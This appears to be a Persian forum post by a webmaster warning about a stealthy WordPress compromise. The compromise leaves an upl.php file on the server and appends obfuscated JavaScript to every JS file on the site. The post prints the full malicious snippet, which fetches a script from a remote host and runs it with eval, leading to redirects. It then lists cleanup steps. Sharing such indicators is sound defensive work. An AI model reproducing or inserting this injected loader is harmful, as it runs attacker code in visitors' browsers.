سلام من یک وبمسترم و امروز میخوام با شما یک موضوعی رو در ارتباط بزارم
خیلی سریع میرم سر اصل مطلب - خیلی از سایت های وردپرس هک شدن بدون اینکه صاحب سایت متوجه بشه به خاطر اینکه هیچ تغییر در ظاهر سایت اتفاق نمی افته
ببینید سایت بعد از هک شدن یک فایل با نام upl.php در دایرکتوری سایت شما ایجاد میشه . و به آخر تمامی فایل های جاوااسکریپت شما کد مخرب زیر اضافه میشه :
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//domainname.com/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
خب طبق تجربه شخصی بنده اتفاق خاصی در عملکرد سایت رخ نمیده اما بعد از مدتی سایت کلا ریدایرکت میشه و چون همون لحظه این اتفاق نمی افته وب مستر سایت دچار مشکل میشه برای عیب یابی .
کدهای فوق رو از تمامی فایل های جاوااسکریپت خود پاک کنید .
فایل های ناشناس رو از دایرکتوری سایت خود پاک کنید .
تمام یوزر و پسورد ها رو بروز رسانی کنید .
وردپرس خود رو به اخرین ورژن بروز کنید .
نسخه PHP سی پنل خود رو به اخرین ورژن آپدیت کنید .
اگر شما هم دچار این حمله شدید نظر خود را کامنت کنید تا بقیه هم استفاده کنند .
اگر راهکاری بلدید هم بیان کنید .
و اگر میدانید که این نفوذ از چه طریقی به وب سایت ها شده باز ممنون میشیم که با بقیه به اشتراک بزارید .
راستی چون این کدها مخرب هست اگر ویروس کش نود 32 دارید هنگام وارد شدن به سایت نود 32 خطا میگیریه که سایت بدافزار داره . و سایتتون رو کامل لود نمیکنه .